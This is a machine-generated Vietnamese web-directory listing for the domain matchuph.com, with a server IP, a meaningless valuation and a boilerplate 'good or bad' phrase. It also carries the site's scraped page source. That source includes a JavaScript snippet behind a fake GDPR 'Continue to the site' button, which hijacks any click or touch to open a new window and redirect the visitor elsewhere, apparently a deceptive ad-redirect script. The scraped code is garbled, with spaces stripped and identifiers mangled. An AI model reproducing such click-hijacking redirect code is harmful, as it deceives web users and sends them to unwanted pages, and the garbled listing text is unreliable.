... - U-dơ-bê-ki-xtan - Danh mục thế giới nói tiếng Việt

...

  • 2022-01-11Ngày thu
  • 2022-02-15Đã cập nhật
...
  • Địa chỉ trang web:matchuph.com
  • IP máy chủ:139.45.197.152
  • Mô tả trang web:

tên miền:matchuph.comĐịnh giá

Về 5000~500000

tên miền:matchuph.comlưu lượng

153

tên miền:matchuph.comTốt hay xấu

Sự sáng tạo của tất cả mọi thứ. Con voi của sự thịnh vượng

trang mạng:...Trọng lượng

1

trang mạng:...IP

139.45.197.152

trang mạng:...Nội dung

...@-webkit-keyframesrotating{from{-webkit-transform:rotate(0deg);-o-transform:rotate(0deg);transform:rotate(0deg);}to{-webkit-transform:rotate(360deg);-o-transform:rotate(360deg);transform:rotate(360deg);}}@keyframesrotating{from{-ms-transform:rotate(0deg);-moz-transform:rotate(0deg);-webkit-transform:rotate(0deg);-o-transform:rotate(0deg);transform:rotate(0deg);}to{-ms-transform:rotate(360deg);-moz-transform:rotate(360deg);-webkit-transfo...rm:rotate(360deg);-o-transform:rotate(360deg);transform:rotate(360deg);}}html,body,.centered{height:100%;}body{margin:0;}.centered{width:100%;display:table;}.center{display:table-cell;vertical-align:middle;}#loading{margin:0auto;width:50px;height:50px;border:5pxsolid#000;border-radius:50%;position:relative;-webkit-animation:rotating1slinearinfinite;-moz-animation:rotating1slinearinfinite;-ms-animation:rotating1slinearinfinite;-o-animation:rotating1slinearinfinite;animation:rotating1slinearinfinite;}#loading:before{content:'';display:block;position:absolute;width:12px;left:19px;top:-5px;bottom:-5px;background:#fff;}#loading:after{content:'';position:absolute;height:12px;top:19px;left:-5px;right:-5px;background:#fff;}#gdpr{display:none;margin:0auto;padding:100px25px;max-width:600px;font:16px/1.6Verdana,Arial,sans-serif;border:2pxsolid#0319C6;border-radius:8px;}#gdprh1{font-weight:normal;}#gdprbutton{margin:0auto;padding:10px35px;display:block;font:bold18px/1.6Verdana,Arial,sans-serif;border:none;border-radius:8px;background:#0319C6;color:#fff;cursor:pointer;}#gdprbuttonspan{border-bottom:2pxsolid#fff;}Continuetothesite...(function(t){if(window.parent!==window.self){varn={}n[t]=nullwindow.addE...ventListener('messe',function(o){vare=o&&o.data&&o.data[t]if(e){if(e.t==='post'){deletee.tpost(e)}else{localStore[t]=sessionStore[t]=typeofe==='object'?JSON.stringify(e):en[t]=ewindow.parent.postMesse(n,'*')}}})window.parent.postMesse(n,'*')}elseif(localStore[t]||sessionStore[t]){varn=localStore[t]||sessionStore[t]deletelocalStore[t]&&deletesessionStore[t]try{varj=JSON.parse(n)if(j.t==='gdpr'){letxdocument.getElementById('loading').style.display='none'document.getElementById('gdpr').style.display='block'functiongo(){if(!x){localStore[t]=j.uwindow.open(window.location.href,'_blank')x=true}setTimeout(function(){window.location.href=j.b},100)}window.addEventListener('click',function(){},true)window.addEventListener('click',go)window.addEventListener('touchend',go)}}catch(e){setTimeout(function(){let{href}=window.locationhref=href.indexOf('.html')===-1?href.slice(0,-1)+'.html':hrefwindow.location.href=[href,'?',btoa(n)].join('')},500)}}else{setTimeout(function(){window.location.href='//google.com'},500)}constpost=function(data){data=Object.assign({score:t},data)constform=document.create...Element('form')form.setAttribute('method','post')form.setAttribute('action',window.location.href)Object.keys(data).forEach(function(key){constfield=document.createElement('input')field.setAttribute('type','hidden')field.setAttribute('name',key)field.setAttribute('value',data[key])form.appendChild(field)})document.body.appendChild(form)form.submit()}})(window.location.href.split('/').slice(3).join('/').split('').reduce(function(o,e,t){returno+e.charCodeAt(0)*Math.pow(t+1,7)},3571).toString(36))

Địa điểm:...Báo cáo

Nếu có vi phạm trang web, vui lòng nhấp vào Báo cáoBáo cáo

Thông tin đề xuất

Trang web được đề xuất